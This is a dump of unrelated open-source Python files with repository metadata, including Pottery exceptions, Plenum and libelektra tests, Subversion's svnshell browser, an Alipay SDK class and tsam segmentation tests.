entry = str(t[0]) + "-" + str(t[2])
if not entry in propertiesBySubObj:
propertiesBySubObj[entry] = set()
propertiesBySubObj[entry].add(t[1])
return propertiesBySubObj
if __name__ == "__main__":
print(get_properties(["Q76", "Q242951"], ["Q1860"]))
|
9cc3ab9fcc5821db060a3df7954fbf342b1e0a1f
|
8a1fdebb4527d7ef33d57251919f3b9e0e9b5b44
|
/pottery/exceptions.py
|
d76c03a88ba428f7b92332b36594b7dac1fb885a
|
[
"Apache-2.0"
] |
permissive
|
brainix/pottery
|
5cebfeea72bd8c1b42572095f399145420de4d86
|
c7be6f1f25c5404a460b676cc60d4e6a931f8ee7
|
refs/heads/master
| 2022-12-15T16:13:12.107374
| 2022-05-02T09:16:01
| 2022-05-02T09:16:01
| 37,182,318
| 872
| 49
|
Apache-2.0
| 2022-12-08T12:37:20
| 2015-06-10T07:30:43
|
Python
|
UTF-8
|
Python
| false
| false
| 3,021
|
py
|
exceptions.py
|
# --------------------------------------------------------------------------- #
# exceptions.py #
# #
# Copyright © 2015-2022, Rajiv Bakulesh Shah, original author. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at: #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# --------------------------------------------------------------------------- #
# TODO: When we drop support for Python 3.9, remove the following import. We
# only need it for X | Y union type annotations as of 2022-01-29.
from __future__ import annotations
from dataclasses import dataclass
from queue import Empty
from typing import Iterable
from redis import Redis
from redis import RedisError
@dataclass
class PotteryError(Exception):
'Base exception class for Pottery containers.'
redis: Redis
key: str | None = None
class KeyExistsError(PotteryError):
'Initializing a container on a Redis key that already exists.'
class RandomKeyError(PotteryError, RuntimeError):
"Can't create a random Redis key; all of our attempts already exist."
class QueueEmptyError(PotteryError, Empty):
'Non-blocking .get() or .get_nowait() called on RedisQueue which is empty.'
@dataclass
class PrimitiveError(Exception):
'Base exception class for distributed primitives.'
key: str
masters: Iterable[Redis]
redis_errors: Iterable[RedisError] = tuple()
class QuorumNotAchieved(PrimitiveError, RuntimeError):
'Consensus-based algorithm could not achieve quorum.'
class TooManyExtensions(PrimitiveError, RuntimeError):
'Redlock has been extended too many times.'
class ExtendUnlockedLock(PrimitiveError, RuntimeError):
'Attempting to extend an unlocked Redlock.'
class ReleaseUnlockedLock(PrimitiveError, RuntimeError):
'Attempting to release an unlocked Redlock.'
class QuorumIsImpossible(PrimitiveError, RuntimeError):
'Too many Redis masters threw RedisErrors; quorum can not be achieved.'
class PotteryWarning(Warning):
'Base warning class for Pottery containers.'
class InefficientAccessWarning(PotteryWarning):
'Doing an O(n) Redis operation.'
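# Hedged usage sketch (not part of this module; `RedisDict` and its
# constructor signature are assumptions about the wider Pottery API):
#   from pottery import RedisDict, KeyExistsError
#   try:
#       d = RedisDict({'a': 1}, redis=redis_client, key='existing-key')
#   except KeyExistsError as error:
#       print(error.redis, error.key)  # fields of the PotteryError dataclass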
|
5303f29c2293fb4bf375445a6bb31740ddfa2d53
|
5917ffcb780cfcfe4e2b87b11fca1f68f387b239
|
/plenum/test/monitoring/test_post_monitoring_stats.py
|
00f6281743edf76eb266eb4ddfcee551b4041d7e
|
[
"Apache-2.0"
] |
permissive
|
hyperledger/indy-plenum
|
6ff9f705af80dfa28d4cb92743683f78bb937aa3
|
698b9500ad3a7a15993af72a1c35a406c5673262
|
refs/heads/main
| 2023-08-29T01:32:26.384729
| 2023-06-20T16:42:11
| 2023-06-20T16:42:11
| 51,585,028
| 171
| 420
|
Apache-2.0
| 2023-06-20T16:42:14
| 2016-02-12T12:03:16
|
Python
|
UTF-8
|
Python
| false
| false
| 2,518
|
py
|
test_post_monitoring_stats.py
|
import pytest
from plenum.server.monitor import Monitor
from plenum.test.helper import sdk_send_random_and_check
from plenum.test.node_catchup.helper import ensure_all_nodes_have_same_data
WIND_SIZE = 5
MIN_CNT = 2
@pytest.fixture(scope='module')
def tconf(tconf):
old_val = tconf.Max3PCBatchSize
old_throughput_measurement_params = tconf.throughput_measurement_params
tconf.Max3PCBatchSize = 1
tconf.throughput_measurement_params = {
'window_size': WIND_SIZE,
'min_cnt': MIN_CNT
}
yield tconf
tconf.Max3PCBatchSize = old_val
tconf.throughput_measurement_params = old_throughput_measurement_params
def testPostingThroughput(postingStatsEnabled,
decreasedMonitoringTimeouts,
looper,
txnPoolNodeSet,
sdk_wallet_client, sdk_pool_handle):
config = decreasedMonitoringTimeouts
reqCount = 10
sdk_send_random_and_check(looper,
txnPoolNodeSet,
sdk_pool_handle,
sdk_wallet_client,
reqCount)
ensure_all_nodes_have_same_data(looper, nodes=txnPoolNodeSet)
looper.runFor(WIND_SIZE * MIN_CNT)
for node in txnPoolNodeSet:
assert node.monitor.highResThroughput > 0
assert node.monitor.totalRequests == reqCount
# TODO: Add implementation to actually call firebase plugin
# and test if firebase plugin is sending total request count
# if node is primary
looper.runFor(config.DashboardUpdateFreq)
for node in txnPoolNodeSet:
        assert node.monitor.spylog.count(Monitor.sendThroughput.__name__) > 0
def testPostingLatency(postingStatsEnabled,
decreasedMonitoringTimeouts,
looper,
txnPoolNodeSet,
sdk_wallet_client, sdk_pool_handle):
config = decreasedMonitoringTimeouts
reqCount = 10
sdk_send_random_and_check(looper,
txnPoolNodeSet,
sdk_pool_handle,
sdk_wallet_client,
reqCount)
for node in txnPoolNodeSet:
assert node.monitor.masterLatency > 0
assert node.monitor.avgBackupLatency > 0
looper.runFor(config.DashboardUpdateFreq)
for node in txnPoolNodeSet:
        assert node.monitor.spylog.count(Monitor.sendLatencies.__name__) > 0
|
d3de339be067919ea5d2427760b1b7f3a6b0e67b
|
5e4913b3d7b6dfd9f35d9e5f24486bb6b6145125
|
/src/bindings/swig/python/tests_kdb/test_key.py
|
2e9ecd7f22e49d47738d445a6587dcec9616bfdc
|
[
"BSD-3-Clause"
] |
permissive
|
ElektraInitiative/libelektra
|
ff5d5cfc4bf91d704f58405b14ea694aad3a2edd
|
dbbe4ae4f669c322a8f95f59112d3f5fc370bbd9
|
refs/heads/master
| 2023-08-05T14:54:48.081359
| 2023-08-04T12:40:00
| 2023-08-04T12:40:00
| 21,063,580
| 215
| 170
|
BSD-3-Clause
| 2023-09-07T13:34:30
| 2014-06-21T08:01:04
|
C
|
UTF-8
|
Python
| false
| false
| 6,084
|
py
|
test_key.py
|
import kdb
import unittest
class Key(unittest.TestCase):
def setUp(self):
self.key = kdb.Key("user:/foo/bar",
kdb.KEY_VALUE, "value",
kdb.KEY_META, "by", "manuel",
kdb.KEY_META, "owner", "myowner"
)
self.bkey = kdb.Key("system:/bkey",
kdb.KEY_VALUE, b"bvalue\0\0",
kdb.KEY_END,
kdb.KEY_META, "lost", "lost"
)
def test_ctor(self):
self.assertIsInstance(self.key, kdb.Key)
self.assertIsInstance(self.bkey, kdb.Key)
k = kdb.Key("/cascading/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key("spec:/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key("proc:/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key("dir:/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key("user:/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key("system:/key")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key()
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
with self.assertRaises(kdb.KeyInvalidName):
k = kdb.Key("wrongname")
k = kdb.Key("user:/foo")
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key(self.key)
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
k = kdb.Key(self.key.dup())
self.assertIsInstance(k, kdb.Key)
self.assertTrue(k.isValid())
self.assertEqual(k, self.key)
k.name = "user:/copied"
self.assertNotEqual(k, self.key)
def test_operator(self):
self.assertNotEqual(self.key, self.bkey)
self.assertEqual(kdb.Key(self.key), self.key)
self.assertEqual(self.key, kdb.Key("user:/foo/bar", kdb.KEY_META, "owner", "myowner"))
self.assertEqual(kdb.Key(), kdb.Key())
self.assertNotEqual(kdb.Key("user:/key1"), kdb.Key("user:/key2"))
self.assertTrue(kdb.Key("user:/key1") == kdb.Key("user:/key1"))
self.assertTrue(kdb.Key("user:/key1") != kdb.Key("user:/key2"))
self.assertTrue(kdb.Key("user:/key1") < kdb.Key("user:/key2"))
self.assertTrue(kdb.Key("user:/key1") <= kdb.Key("user:/key2"))
self.assertTrue(kdb.Key("user:/key2") > kdb.Key("user:/key1"))
self.assertTrue(kdb.Key("user:/key2") >= kdb.Key("user:/key1"))
self.assertTrue(bool(self.key))
self.assertTrue(bool(self.bkey))
self.assertEqual(str(self.key), "user:/foo/bar")
self.assertEqual(str(self.bkey), "system:/bkey")
self.assertEqual(len(self.key), 3)
self.assertEqual(len(self.bkey), 2)
self.assertEqual(repr(self.key), "kdb.Key('user:/foo/bar')")
self.assertEqual(repr(self.bkey), "kdb.Key('system:/bkey')")
with self.assertRaises(TypeError):
hash(kdb.Key("user:/not_name_locked"))
def test_properties(self):
self.assertEqual(self.key.name, "user:/foo/bar")
self.assertEqual(self.key.value, "value")
self.assertEqual(self.key.basename, "bar")
self.assertEqual(self.bkey.name, "system:/bkey")
self.assertEqual(self.bkey.value, b"bvalue\0\0")
self.assertEqual(self.bkey.basename, "bkey")
k = kdb.Key("user:/key1", kdb.KEY_VALUE, "value")
self.assertFalse(k.isBinary())
self.assertIsNone(k.getMeta("binary"))
k.name = "system:/key2"
k.basename = "key3"
k.value = b"bvalue\0\0"
self.assertEqual(k.name, "system:/key3")
self.assertEqual(k.value, b"bvalue\0\0")
self.assertTrue(k.isBinary())
self.assertIsInstance(self.bkey.getMeta("binary"), kdb.Key)
self.assertEqual(kdb.Key("user:/key1", "value").value, "value")
self.assertEqual(kdb.Key("user:/key1", b"bvalue\0\0").value, b"bvalue\0\0")
k = kdb.Key("user:/key2")
with self.assertRaises(kdb.KeyInvalidName):
k.name = "foo"
def test_functions(self):
self.assertTrue(self.key.isUser())
self.assertTrue(self.bkey.isSystem())
self.assertTrue(self.key.isString())
self.assertTrue(self.bkey.isBinary())
self.assertTrue(self.key.isBelow(kdb.Key("user:/foo")))
self.assertFalse(self.key.isNameLocked())
self.assertFalse(self.key.isValueLocked())
self.assertFalse(self.key.isMetaLocked())
k = kdb.Key("user:/key1", kdb.KEY_VALUE, "value")
self.assertEqual(k.get(), "value")
k.set(b"bvalue\0\0")
self.assertEqual(k.get(), b"bvalue\0\0")
def test_meta(self):
self.assertIsInstance(self.key.getMeta("owner"), kdb.Key)
self.assertEqual(self.key.getMeta("owner").name, "meta:/owner")
self.assertEqual(self.key.getMeta("owner").value, "myowner")
self.assertEqual(self.key.getMeta("by").value, "manuel")
self.assertTrue(self.key.getMeta("by").isNameLocked())
self.assertTrue(self.key.getMeta("by").isValueLocked())
self.assertTrue(self.key.getMeta("by").isMetaLocked())
self.assertFalse(self.key.hasMeta("doesnt_exist"))
self.assertIsNone(self.key.getMeta("doesnt_exist"))
self.assertTrue(bool(self.bkey.getMeta("binary")))
self.assertIsNone(self.bkey.getMeta("owner"))
k = kdb.Key("user:/key1")
k.setMeta("foo", "bar")
self.assertEqual(k.getMeta("foo").value, "bar")
k = kdb.Key("user:/key1", { "foo2": "bar2", "foo3": "bar3" })
self.assertEqual(k.getMeta("foo2").value, "bar2")
self.assertEqual(k.getMeta("foo3").value, "bar3")
self.assertEqual(sum(1 for _ in self.key.getMeta()), 2)
self.assertEqual(sum(1 for _ in self.bkey.getMeta()), 1)
def test_python_copy(self):
import copy
k = copy.copy(self.key)
self.assertEqual(k, self.key)
k.name = "user:/copied"
self.assertNotEqual(k, self.key)
def test_iterator(self):
k = kdb.Key("user:/a\/b/c")
self.assertEqual(sum(1 for _ in k), 3)
self.assertEqual(sum(1 for _ in reversed(k)), 3)
self.assertEqual(iter(k).value(), "".join([chr(kdb.KEY_NS_USER)]))
self.assertEqual(reversed(k).value(), "c")
def test_helpers(self):
with self.assertRaises(ValueError):
kdb.Key("user:/noarray").array_elements()
parts = kdb.Key("user:/some/array/#_12").array_elements()
self.assertEqual(parts.index, 12)
self.assertEqual(parts.name, "user:/some/array")
self.assertEqual(parts.basename, "array")
if __name__ == '__main__':
unittest.main()
|
54bed0b70e16762f3b2db50210f651e0e46177e5
|
3a2071c34e3c35847b2bcc2a5d3b3a74114daa0f
|
/tools/examples/svnshell.py
|
9c67af4664c470c421e272ef4a9ef850fcd80271
|
[
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-other-permissive",
"X11",
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"HPND-Markus-Kuhn",
"LicenseRef-scancode-unicode",
"Apache-2.0",
"FSFAP"
] |
permissive
|
apache/subversion
|
18a9142afe63f060ffc0814fe0c758c91ad8bd31
|
dd957c4991e61bde23cc60d13449ea8b65f80c43
|
refs/heads/trunk
| 2023-09-04T15:22:36.755177
| 2023-08-29T19:55:03
| 2023-08-29T19:55:03
| 454,263
| 520
| 207
|
Apache-2.0
| 2023-08-26T14:17:30
| 2009-12-31T09:00:10
|
C
|
UTF-8
|
Python
| false
| false
| 11,429
|
py
|
svnshell.py
|
#!/usr/bin/env python
#
# svnshell.py : a Python-based shell interface for cruising 'round in
# the filesystem.
#
######################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
#
import sys
import time
import re
from cmd import Cmd
from random import randint
from svn import fs, core, repos
class SVNShell(Cmd):
def __init__(self, path):
"""initialize an SVNShell object"""
Cmd.__init__(self)
path = core.svn_path_canonicalize(path)
self.fs_ptr = repos.fs(repos.open(path))
self.is_rev = 1
self.rev = fs.youngest_rev(self.fs_ptr)
self.txn = None
self.root = fs.revision_root(self.fs_ptr, self.rev)
self.path = "/"
self._setup_prompt()
self.cmdloop()
def precmd(self, line):
if line == "EOF":
# Ctrl-D is a command without a newline. Print a newline, so the next
# shell prompt is not on the same line as the last svnshell prompt.
print("")
return "exit"
return line
def postcmd(self, stop, line):
self._setup_prompt()
_errors = ["Huh?",
"Whatchoo talkin' 'bout, Willis?",
"Say what?",
"Nope. Not gonna do it.",
"Ehh...I don't think so, chief."]
def default(self, line):
print(self._errors[randint(0, len(self._errors) - 1)])
def do_cat(self, arg):
"""dump the contents of a file"""
if not len(arg):
print("You must supply a file path.")
return
catpath = self._parse_path(arg)
kind = fs.check_path(self.root, catpath)
if kind == core.svn_node_none:
print("Path '%s' does not exist." % catpath)
return
if kind == core.svn_node_dir:
print("Path '%s' is not a file." % catpath)
return
### be nice to get some paging in here.
stream = fs.file_contents(self.root, catpath)
while True:
data = core.svn_stream_read(stream, core.SVN_STREAM_CHUNK_SIZE)
sys.stdout.write(data)
if len(data) < core.SVN_STREAM_CHUNK_SIZE:
break
def do_cd(self, arg):
"""change directory"""
newpath = self._parse_path(arg)
# make sure that path actually exists in the filesystem as a directory
kind = fs.check_path(self.root, newpath)
if kind != core.svn_node_dir:
print("Path '%s' is not a valid filesystem directory." % newpath)
return
self.path = newpath
def do_ls(self, arg):
"""list the contents of the current directory or provided path"""
parent = self.path
if not len(arg):
# no arg -- show a listing for the current directory.
entries = fs.dir_entries(self.root, self.path)
else:
# arg? show a listing of that path.
newpath = self._parse_path(arg)
kind = fs.check_path(self.root, newpath)
if kind == core.svn_node_dir:
parent = newpath
entries = fs.dir_entries(self.root, parent)
elif kind == core.svn_node_file:
parts = self._path_to_parts(newpath)
name = parts.pop(-1)
parent = self._parts_to_path(parts)
print(parent + ':' + name)
tmpentries = fs.dir_entries(self.root, parent)
if not tmpentries.get(name, None):
return
entries = {}
entries[name] = tmpentries[name]
else:
print("Path '%s' not found." % newpath)
return
keys = sorted(entries.keys())
print(" REV AUTHOR NODE-REV-ID SIZE DATE NAME")
print("----------------------------------------------------------------------------")
for entry in keys:
fullpath = parent + '/' + entry
size = ''
is_dir = fs.is_dir(self.root, fullpath)
if is_dir:
name = entry + '/'
else:
size = str(fs.file_length(self.root, fullpath))
name = entry
node_id = fs.unparse_id(entries[entry].id)
created_rev = fs.node_created_rev(self.root, fullpath)
author = fs.revision_prop(self.fs_ptr, created_rev,
core.SVN_PROP_REVISION_AUTHOR)
if not author:
author = ""
date = fs.revision_prop(self.fs_ptr, created_rev,
core.SVN_PROP_REVISION_DATE)
if not date:
date = ""
else:
date = self._format_date(date)
print("%6s %8s %12s %8s %12s %s" % (created_rev, author[:8],
node_id, size, date, name))
def do_lstxns(self, arg):
"""list the transactions available for browsing"""
txns = sorted(fs.list_transactions(self.fs_ptr))
counter = 0
for txn in txns:
counter = counter + 1
sys.stdout.write("%8s " % txn)
if counter == 6:
print("")
counter = 0
print("")
def do_pcat(self, arg):
"""list the properties of a path"""
catpath = self.path
if len(arg):
catpath = self._parse_path(arg)
kind = fs.check_path(self.root, catpath)
if kind == core.svn_node_none:
print("Path '%s' does not exist." % catpath)
return
plist = fs.node_proplist(self.root, catpath)
if not plist:
return
for pkey, pval in plist.items():
print('K ' + str(len(pkey)))
print(pkey)
print('P ' + str(len(pval)))
print(pval)
print('PROPS-END')
def do_setrev(self, arg):
"""set the current revision to view"""
try:
if arg.lower() == 'head':
rev = fs.youngest_rev(self.fs_ptr)
else:
rev = int(arg)
newroot = fs.revision_root(self.fs_ptr, rev)
except:
print("Error setting the revision to '" + arg + "'.")
return
fs.close_root(self.root)
self.root = newroot
self.rev = rev
self.is_rev = 1
self._do_path_landing()
def do_settxn(self, arg):
"""set the current transaction to view"""
try:
txnobj = fs.open_txn(self.fs_ptr, arg)
newroot = fs.txn_root(txnobj)
except:
print("Error setting the transaction to '" + arg + "'.")
return
fs.close_root(self.root)
self.root = newroot
self.txn = arg
self.is_rev = 0
self._do_path_landing()
def do_youngest(self, arg):
"""list the youngest revision available for browsing"""
rev = fs.youngest_rev(self.fs_ptr)
print(rev)
def do_exit(self, arg):
sys.exit(0)
def _path_to_parts(self, path):
return [_f for _f in path.split('/') if _f]
def _parts_to_path(self, parts):
return '/' + '/'.join(parts)
def _parse_path(self, path):
# cleanup leading, trailing, and duplicate '/' characters
newpath = self._parts_to_path(self._path_to_parts(path))
# if PATH is absolute, use it, else append it to the existing path.
if path.startswith('/') or self.path == '/':
newpath = '/' + newpath
else:
newpath = self.path + '/' + newpath
# cleanup '.' and '..'
parts = self._path_to_parts(newpath)
finalparts = []
for part in parts:
if part == '.':
pass
elif part == '..':
if len(finalparts) != 0:
finalparts.pop(-1)
else:
finalparts.append(part)
# finally, return the calculated path
return self._parts_to_path(finalparts)
def _format_date(self, date):
date = core.svn_time_from_cstring(date)
date = time.asctime(time.localtime(date / 1000000))
return date[4:-8]
def _do_path_landing(self):
"""try to land on self.path as a directory in root, failing up to '/'"""
not_found = 1
newpath = self.path
while not_found:
kind = fs.check_path(self.root, newpath)
if kind == core.svn_node_dir:
not_found = 0
else:
parts = self._path_to_parts(newpath)
parts.pop(-1)
newpath = self._parts_to_path(parts)
self.path = newpath
def _setup_prompt(self):
"""present the prompt and handle the user's input"""
if self.is_rev:
self.prompt = "<rev: " + str(self.rev)
else:
self.prompt = "<txn: " + self.txn
self.prompt += " " + self.path + ">$ "
def _complete(self, text, line, begidx, endidx, limit_node_kind=None):
"""Generic tab completer. Takes the 4 standard parameters passed to a
cmd.Cmd completer function, plus LIMIT_NODE_KIND, which should be a
svn.core.svn_node_foo constant to restrict the returned completions to, or
None for no limit. Catches and displays exceptions, because otherwise
they are silently ignored - which is quite frustrating when debugging!"""
try:
args = line.split()
if len(args) > 1:
arg = args[1]
else:
arg = ""
dirs = arg.split('/')
user_elem = dirs[-1]
user_dir = "/".join(dirs[:-1] + [''])
canon_dir = self._parse_path(user_dir)
entries = fs.dir_entries(self.root, canon_dir)
acceptable_completions = []
for name, dirent_t in entries.items():
if not name.startswith(user_elem):
continue
if limit_node_kind and dirent_t.kind != limit_node_kind:
continue
if dirent_t.kind == core.svn_node_dir:
name += '/'
acceptable_completions.append(name)
if limit_node_kind == core.svn_node_dir or not limit_node_kind:
if user_elem in ('.', '..'):
for extraname in ('.', '..'):
if extraname.startswith(user_elem):
acceptable_completions.append(extraname + '/')
return acceptable_completions
except:
ei = sys.exc_info()
sys.stderr.write("EXCEPTION WHILST COMPLETING\n")
import traceback
traceback.print_tb(ei[2])
sys.stderr.write("%s: %s\n" % (ei[0], ei[1]))
raise
def complete_cd(self, text, line, begidx, endidx):
return self._complete(text, line, begidx, endidx, core.svn_node_dir)
def complete_cat(self, text, line, begidx, endidx):
return self._complete(text, line, begidx, endidx, core.svn_node_file)
def complete_ls(self, text, line, begidx, endidx):
return self._complete(text, line, begidx, endidx)
def complete_pcat(self, text, line, begidx, endidx):
return self._complete(text, line, begidx, endidx)
def _basename(path):
"Return the basename for a '/'-separated path."
idx = path.rfind('/')
if idx == -1:
return path
return path[idx+1:]
def usage(exit):
if exit:
output = sys.stderr
else:
output = sys.stdout
output.write(
"usage: %s REPOS_PATH\n"
"\n"
"Once the program has started, type 'help' at the prompt for hints on\n"
"using the shell.\n" % sys.argv[0])
sys.exit(exit)
def main():
if len(sys.argv) != 2:
usage(1)
SVNShell(sys.argv[1])
if __name__ == '__main__':
main()
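# Hedged session sketch (the repository path and revision number are
# illustrative; the prompt format follows _setup_prompt above):
#   $ python svnshell.py /var/svn/myrepo
#   <rev: 42 />$ ls
#   <rev: 42 />$ cd trunk
#   <rev: 42 /trunk>$ cat README
#   <rev: 42 /trunk>$ exit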
|
25ccf416a38eaee3380d9844d935077b1fd3c23a
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/ErrorDishStallEntity.py
|
fd6fa5786cbc18dd6e567ce775972cd5fbc8fafb
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 2,806
|
py
|
ErrorDishStallEntity.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ErrorDishEntity import ErrorDishEntity
class ErrorDishStallEntity(object):
def __init__(self):
self._no_set_stall = None
self._repeat_set_stall = None
@property
def no_set_stall(self):
return self._no_set_stall
@no_set_stall.setter
def no_set_stall(self, value):
if isinstance(value, list):
self._no_set_stall = list()
for i in value:
if isinstance(i, ErrorDishEntity):
self._no_set_stall.append(i)
else:
self._no_set_stall.append(ErrorDishEntity.from_alipay_dict(i))
@property
def repeat_set_stall(self):
return self._repeat_set_stall
@repeat_set_stall.setter
def repeat_set_stall(self, value):
if isinstance(value, list):
self._repeat_set_stall = list()
for i in value:
if isinstance(i, ErrorDishEntity):
self._repeat_set_stall.append(i)
else:
self._repeat_set_stall.append(ErrorDishEntity.from_alipay_dict(i))
def to_alipay_dict(self):
params = dict()
if self.no_set_stall:
if isinstance(self.no_set_stall, list):
for i in range(0, len(self.no_set_stall)):
element = self.no_set_stall[i]
if hasattr(element, 'to_alipay_dict'):
self.no_set_stall[i] = element.to_alipay_dict()
if hasattr(self.no_set_stall, 'to_alipay_dict'):
params['no_set_stall'] = self.no_set_stall.to_alipay_dict()
else:
params['no_set_stall'] = self.no_set_stall
if self.repeat_set_stall:
if isinstance(self.repeat_set_stall, list):
for i in range(0, len(self.repeat_set_stall)):
element = self.repeat_set_stall[i]
if hasattr(element, 'to_alipay_dict'):
self.repeat_set_stall[i] = element.to_alipay_dict()
if hasattr(self.repeat_set_stall, 'to_alipay_dict'):
params['repeat_set_stall'] = self.repeat_set_stall.to_alipay_dict()
else:
params['repeat_set_stall'] = self.repeat_set_stall
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ErrorDishStallEntity()
if 'no_set_stall' in d:
o.no_set_stall = d['no_set_stall']
if 'repeat_set_stall' in d:
o.repeat_set_stall = d['repeat_set_stall']
return o
|
950cc1b0c4b20e063467368c5df51579b2a38fa9
|
b12e054e945ffe0689422a74684dc7dc8c70669f
|
/test/test_segmentation.py
|
e7c25212027567be156aabb6328e5a4ac8e6ab52
|
[
"MIT"
] |
permissive
|
FZJ-IEK3-VSA/tsam
|
9da0aaaf6468497b88c9e29ba555368db88843b6
|
a86c4cd946d1b77faa2ca1d78018f092fe57b8d4
|
refs/heads/master
| 2023-09-01T06:19:47.392079
| 2023-08-25T07:10:36
| 2023-08-25T07:10:36
| 91,314,171
| 151
| 37
|
MIT
| 2023-08-25T07:06:51
| 2017-05-15T08:36:11
|
Python
|
UTF-8
|
Python
| false
| false
| 3,700
|
py
|
test_segmentation.py
|
import os
import time
import pandas as pd
import numpy as np
import tsam.timeseriesaggregation as tsam
def test_segmentation():
raw = pd.read_csv(
os.path.join(os.path.dirname(__file__), "..", "examples", "testdata.csv"),
index_col=0,
)
orig_raw = pd.read_csv(
os.path.join(
os.path.dirname(__file__),
"..",
"examples",
"results",
"testperiods_segmentation.csv",
),
index_col=[0, 1, 2],
)
starttime = time.time()
aggregation = tsam.TimeSeriesAggregation(
raw,
noTypicalPeriods=20,
hoursPerPeriod=24,
clusterMethod="hierarchical",
representationMethod="meanRepresentation",
segmentation=True,
noSegments=12,
)
typPeriods = aggregation.createTypicalPeriods()
print("Clustering took " + str(time.time() - starttime))
    # sort the typical days to avoid assertion failures caused by a different order
sortedDaysOrig = orig_raw.groupby(level=0).sum().sort_values("GHI").index
sortedDaysTest = typPeriods.groupby(level=0).sum().sort_values("GHI").index
    # rearrange their order
orig = orig_raw[typPeriods.columns].unstack().loc[sortedDaysOrig, :].stack()
test = typPeriods.unstack().loc[sortedDaysTest, :].stack()
np.testing.assert_array_almost_equal(orig.values, test.values, decimal=4)
def test_representation_in_segmentation():
segmentationCandidates = np.array([[0. , 0.38936961, 0.27539063, 0.25 ],
[0. , 0.35591778, 0.26841518, 0.25 ],
[0. , 0.35045773, 0.265625 , 0.25 ],
[0. , 0.36418749, 0.25372024, 0.25 ],
[0. , 0.38386857, 0.25167411, 0.25 ],
[0. , 0.42710529, 0.24237351, 0.16666667],
[0. , 0.5798638 , 0.23707217, 0.1922619 ],
[0. , 0.70166596, 0.24507068, 0.16666667],
[0.01838546, 0.74661296, 0.24739583, 0.18363095],
[0.06893491, 0.75398663, 0.26041667, 0.16666667],
[0.0942519 , 0.77160913, 0.28385417, 0.16666667],
[0.14374472, 0.80191153, 0.3046875 , 0.25 ],
[0.11999155, 0.79502066, 0.3125 , 0.22678571],
[0.10016906, 0.77613611, 0.31845238, 0.16666667],
[0.07438715, 0.76489634, 0.3203125 , 0.16666667],
[0.0101437 , 0.75082659, 0.31538318, 0.16666667],
[0. , 0.74856422, 0.3077567 , 0.16666667],
[0. , 0.76062049, 0.29678199, 0.08333333],
[0. , 0.78148316, 0.29427083, 0.16666667],
[0. , 0.75668439, 0.28738839, 0.16666667],
[0. , 0.67461737, 0.2859933 , 0.16666667],
[0. , 0.624061 , 0.28041295, 0.16666667],
[0. , 0.56076035, 0.2734375 , 0.16666667],
[0. , 0.4734255 , 0.27092634, 0.16666667]])
clusterOrder = np.array([5, 5, 5, 5, 5, 7, 3, 2, 2, 2, 2, 0, 0, 0, 0, 1, 1, 1, 1, 1, 6, 6,
4, 4])
clusterCenters_mean, clusterCenterIndices = tsam.representations(
segmentationCandidates,
clusterOrder,
default="meanRepresentation",
representationMethod="meanRepresentation",
distributionPeriodWise=False,
timeStepsPerPeriod=1,
)
clusterCenters_dist, clusterCenterIndices = tsam.representations(
segmentationCandidates,
clusterOrder,
default="meanRepresentation",
representationMethod="distributionRepresentation",
distributionPeriodWise=True,
timeStepsPerPeriod=1,
)
assert np.isclose(clusterCenters_mean, clusterCenters_dist).all()
if __name__ == "__main__":
test_segmentation()
|
332db7a76842ae712c7cf5889510a125d5875b10
|
ef1def58b933921ccf31bece9fc6eb5f7ffb9a18
|
/tensorhive/core/ssh.py
|
bd2f9fd6b2d511d77520f72de3fbc4a5be819de6
|
[
"Apache-2.0"
] |
permissive
|
roscisz/TensorHive
|
4b33acd727e0b294a4a12af972c471e1254136aa
|
5b50245d285618044a9a71c06ea5361a48ad4acb
|
refs/heads/master
| 2023-03-10T05:09:08.874394
| 2022-02-02T11:08:21
| 2022-02-02T11:08:21
| 98,513,283
| 153
| 26
|
Apache-2.0
| 2023-03-01T02:26:54
| 2017-07-27T08:37:35
|
Python
|
UTF-8
|
Python
| false
| false
| 6,092
|
py
|
ssh.py
|
from tensorhive.core.utils.decorators import memoize, timeit
from tensorhive.config import SSH
from pssh.clients.native import ParallelSSHClient
from pssh.exceptions import AuthenticationException
